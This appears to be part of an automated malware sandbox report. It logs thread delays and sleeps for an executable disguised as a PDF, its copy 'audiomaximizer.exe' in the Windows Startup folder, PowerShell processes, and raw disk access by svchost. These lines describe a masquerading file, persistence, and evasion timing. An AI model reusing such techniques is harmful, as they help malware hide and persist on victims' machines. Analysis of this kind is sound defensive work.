Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 595250
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 595140
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 595031
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 594921
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 594812
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 594703
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 594593
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 594484

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3683	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Window / User API: threadDelayed 1887	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Window / User API: threadDelayed 7964	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4258
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 918
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Window / User API: threadDelayed 8104
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Window / User API: threadDelayed 1745

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4444	Thread sleep count: 3683 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4944	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2724	Thread sleep count: 219 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6824	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276	Thread sleep time: -30437127721620741s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276	Thread sleep time: -599874s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276	Thread sleep time: -599546s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276	Thread sleep time: -599310s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276	Thread sleep time: -599200s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276	Thread sleep time: -599062s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276	Thread sleep time: -598953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276	Thread sleep time: -598843s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276	Thread sleep time: -598734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276	Thread sleep time: -598625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276	Thread sleep time: -598515s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276	Thread sleep time: -598388s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276	Thread sleep time: -598280s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276	Thread sleep time: -598170s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276	Thread sleep time: -598062s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276	Thread sleep time: -597953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276	Thread sleep time: -597843s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276	Thread sleep time: -597734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276	Thread sleep time: -597625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276	Thread sleep time: -597515s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276	Thread sleep time: -597406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276	Thread sleep time: -597297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276	Thread sleep time: -597187s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276	Thread sleep time: -597077s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276	Thread sleep time: -596968s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276	Thread sleep time: -596825s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276	Thread sleep time: -596717s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276	Thread sleep time: -596544s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276	Thread sleep time: -596424s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276	Thread sleep time: -596297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276	Thread sleep time: -596187s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276	Thread sleep time: -596078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276	Thread sleep time: -595968s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276	Thread sleep time: -595859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276	Thread sleep time: -595750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276	Thread sleep time: -595640s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276	Thread sleep time: -595531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276	Thread sleep time: -595422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276	Thread sleep time: -595312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276	Thread sleep time: -595203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276	Thread sleep time: -595093s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276	Thread sleep time: -594984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276	Thread sleep time: -594875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276	Thread sleep time: -594765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276	Thread sleep time: -594656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276	Thread sleep time: -594547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276	Thread sleep time: -594437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276	Thread sleep time: -594327s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7212	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5428	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7508	Thread sleep count: 4258 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7504	Thread sleep count: 918 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7540	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7524	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680	Thread sleep time: -28592453314249787s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680	Thread sleep time: -599750s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680	Thread sleep time: -599640s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680	Thread sleep time: -599531s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680	Thread sleep time: -599422s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680	Thread sleep time: -599312s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680	Thread sleep time: -599202s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680	Thread sleep time: -599093s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680	Thread sleep time: -598984s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680	Thread sleep time: -598874s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680	Thread sleep time: -598765s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680	Thread sleep time: -598656s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680	Thread sleep time: -598544s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680	Thread sleep time: -598437s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680	Thread sleep time: -598328s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680	Thread sleep time: -598218s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680	Thread sleep time: -598109s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680	Thread sleep time: -598000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680	Thread sleep time: -597890s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680	Thread sleep time: -597763s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680	Thread sleep time: -597655s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680	Thread sleep time: -597546s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680	Thread sleep time: -597437s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680	Thread sleep time: -597325s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680	Thread sleep time: -597218s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680	Thread sleep time: -597109s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680	Thread sleep time: -597000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680	Thread sleep time: -596890s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680	Thread sleep time: -596781s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680	Thread sleep time: -596671s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680	Thread sleep time: -596562s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680	Thread sleep time: -596452s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680	Thread sleep time: -596343s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680	Thread sleep time: -596234s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680	Thread sleep time: -596125s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680	Thread sleep time: -596015s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680	Thread sleep time: -595906s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680	Thread sleep time: -595794s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680	Thread sleep time: -595687s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680	Thread sleep time: -595578s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680	Thread sleep time: -595468s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680	Thread sleep time: -595359s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680	Thread sleep time: -595250s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680	Thread sleep time: -595140s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680	Thread sleep time: -595031s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680	Thread sleep time: -594921s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680	Thread sleep time: -594812s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680	Thread sleep time: -594703s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680	Thread sleep time: -594593s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680	Thread sleep time: -594484s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 599874	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 599310	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 599200	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 599062	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 598953	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 598843	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 598734	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 598625	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 598515	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 598388	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 598280	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 598170	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 598062	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 597953	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 597843	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 597734	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 597625	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 597515	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 597406	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 597297	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 597187	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 597077	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 596968	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 596825	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 596717	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 596544	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 596424	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 596297	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 596187	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 596078	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 595968	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 595859	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 595750	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 595640	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 595531	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 595422	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 595312	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 595203	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 595093	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 594984	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 594875	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 594765	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 594656	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 594547	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 594437	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Thread delayed: delay time: 594327	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 599750
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 599640
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 599531
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 599422
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 599312
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 599202
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 599093
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 598984
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 598874
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 598765
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 598656
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 598544
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 598437
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 598328
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 598218
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 598109
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 598000
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 597890
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 597763
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 597655
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 597546
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 597437
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 597325
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 597218
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 597109
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 597000
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 596890
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 596781
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 596671
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 596562
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 596452
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 596343
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 596234
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 596125
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Thread delayed: delay time: 596015
